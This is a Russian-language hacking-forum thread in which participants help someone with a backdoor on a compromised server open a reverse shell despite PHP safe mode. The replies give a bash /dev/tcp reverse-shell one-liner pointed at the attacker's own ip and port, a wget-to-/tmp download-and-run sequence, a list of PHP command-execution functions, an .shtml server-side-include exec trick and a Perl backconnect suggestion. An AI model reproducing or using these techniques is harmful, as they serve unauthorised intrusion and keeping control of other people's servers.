Backconnect через бекдор

На сервере не работает ни 1 шел, сейф мод включен


Вопрос:
Как через бекдор, сделать бекконект, не имея шела?



Пытался залить скрипт бэкконекта, и запустить командой

Но увы не получилось, какие ещё есть способы?

 

Залей через wget бэкконект в /tmp, переместись из текущего каталога в папку /tmp: cd /tmp, дай права на выполнение и запускай.
P.S. возможно не работает команда system, попробуй другие.

 

passthru, system, exec, shell_exec

 

Покури вот в этом ключе:
/bin/bash < /dev/tcp/ourip/port &>/dev/tcp/ourip/port

 

Скорее всего у него отключены функции для выполнения системных команд

 

А они вовсе не обязательны. Судя по всему есть возможность аплоадить файлы, но вследствие жестких ограничений на php, стандартные шелы не работают. Можно попробовать залить .shtml файл вида <!--#exec cmd="system command" --> и в его контексте выполнить вышеуказанную схему. Правда там надо немного покопать гугл, есть нюансы при провешивании обратного соединения таким образом.

 

shtml шелл
еще команды, позволяющие выполнить команду - proc_open, popen

 

Тогда зиливай перловский скрипт на backconnect и через него додалбливай.

 

выведи значение disable_functions